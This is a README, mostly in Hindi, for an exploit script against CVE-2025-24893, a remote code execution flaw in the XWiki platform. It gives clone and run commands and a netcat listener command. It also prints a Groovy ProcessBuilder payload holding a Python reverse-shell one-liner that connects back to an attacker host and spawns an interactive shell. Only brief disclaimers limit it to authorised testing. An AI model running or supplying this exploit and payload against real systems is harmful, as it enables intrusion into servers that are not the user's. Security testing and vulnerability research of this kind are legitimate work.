
Modified exploit for CVE-2025-24893
XWiki प्लेटफ़ॉर्म में CVE-2025-24893, एक दूरस्थ कोड निष्पादन (RCE) भेद्यता का शोषण करने के लिए एक सरल Python3 स्क्रिप्ट, जो Groovy-आधारित async मैक्रो और एक कॉन्फ़िगरेबल रिवर्स शेल पेलोड का उपयोग करती है।
⚠️ चेतावनी: यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
Runtime.exec की विचित्रताओं से बचने के लिए एक Groovy ProcessBuilder स्निपेट तैयार करता हैrequests लाइब्रेरीpip install requests
इस रिपॉजिटरी को क्लोन करें:
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
<TARGET_DOMAIN>
XWiki होस्ट (जैसे wiki.example.local)।
<LHOST>
आपकी आक्रमणकारी मशीन का IP (जहाँ आपका लिसनर चल रहा है)।
<LPORT>
आपका लिसनर पोर्ट (पूर्णांक)।
nc -lvnp 4444
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
netcat लिसनर की जाँच करें।पेलोड भेजने से पहले, स्क्रिप्ट:
https://<TARGET_DOMAIN> को आज़माती हैhttp://<TARGET_DOMAIN> पर फ़ॉलबैक करती हैयह मिश्रित-प्रोटोकॉल परिनियोजन के साथ संगतता सुनिश्चित करने में मदद करता है।
डिफ़ॉल्ट रूप से, स्क्रिप्ट एक Python3 वन-लाइनर का उपयोग करती है:
new ProcessBuilder(
['/bin/bash','-c',
'python3 -c \'import socket,subprocess,os;'
's=socket.socket();s.connect(("LHOST",LPORT));'
'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
build_payload() फ़ंक्शन को संशोधित कर सकते हैं।यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है। विवरण के लिए LICENSE फ़ाइल देखें।
यह उपकरण अधिकृत सुरक्षा मूल्यांकन और शैक्षिक उद्देश्यों के लिए डिज़ाइन किया गया है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं। किसी भी लक्ष्य प्रणाली का परीक्षण करने से पहले हमेशा स्पष्ट अनुमति प्राप्त करें।